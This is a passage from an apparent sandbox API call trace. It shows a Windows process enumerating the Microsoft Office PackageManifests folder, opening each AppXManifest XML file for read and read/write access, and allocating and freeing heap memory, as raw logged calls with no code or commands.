| out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.967] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.967] AreFileApisANSI () returned 1 [0098.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 105 [0098.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.969] GetFileType (hFile=0x418) returned 0x1 [0098.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.969] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.969] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.969] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.969] CloseHandle (hObject=0x418) returned 1 [0098.970] AreFileApisANSI () returned 1 [0098.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 105 [0098.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.970] GetFileType (hFile=0x418) returned 0x1 [0098.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.970] CloseHandle (hObject=0x418) returned 1 [0098.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0098.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0098.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0098.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.971] AreFileApisANSI () returned 1 [0098.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75f30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 105 [0098.971] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x831d63af, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83543a09, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x573e5)) returned 1 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.972] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83e3474a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83e3474a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP6206~1.XML")) returned 1 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x460b8 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c5a8 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0098.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x899e0 [0098.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89810 [0098.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x899e0 | out: hHeap=0x20000) returned 1 [0098.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89810 | out: hHeap=0x20000) returned 1 [0098.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.973] AreFileApisANSI () returned 1 [0098.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0098.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.973] AreFileApisANSI () returned 1 [0098.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 105 [0098.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.974] GetFileType (hFile=0x418) returned 0x1 [0098.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.974] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.974] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.974] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.974] CloseHandle (hObject=0x418) returned 1 [0098.974] AreFileApisANSI () returned 1 [0098.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 105 [0098.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.975] GetFileType (hFile=0x418) returned 0x1 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.975] CloseHandle (hObject=0x418) returned 1 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.976] AreFileApisANSI () returned 1 [0098.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 105 [0098.976] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83e3474a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83e3474a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0098.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.976] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8351d7a8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xfdea, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml", cAlternateFileName="APD1EA~1.XML")) returned 1 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.976] HeapFree (in: 